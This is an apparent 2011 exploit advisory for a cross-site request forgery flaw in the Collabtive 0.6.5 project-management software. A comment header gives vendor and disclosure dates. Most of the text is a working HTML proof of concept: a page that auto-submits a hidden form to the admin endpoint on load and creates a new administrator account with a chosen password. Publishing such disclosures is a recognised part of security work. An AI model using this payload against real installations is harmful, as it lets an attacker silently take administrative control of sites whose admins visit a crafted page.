<!------------------------------------------------------------------------ # Software................Collabtive 0.6.5 # Vulnerability...........Cross-site Request Forgery # Threat Level............Low (1/5) # Download................http://collabtive.o-dyn.de/ # Vendor Contact Date.....3/10/2011 # Disclosure Date.........3/24/2011 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................AutoSec Tools # Site....................http://www.autosectools.com/ # Email...................John Leitch <john@autosectools.com> # ------------------------------------------------------------------------ # # # --Description-- # # A cross-site request forgery vulnerability in Collabtive 0.6.5 can be # exploited to create a new admin. # # # --PoC--> <html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://localhost/collabtive065/admin.php?action=adduser"> <input type="hidden" name="name" value="new_admin" /> <input type="hidden" name="email" value="x@x.com" /> <input type="hidden" name="pass" value="Password1" /> <input type="hidden" name="rate" value="x" /> <input type="hidden" name="role" value="1" /> </form> </body> </html>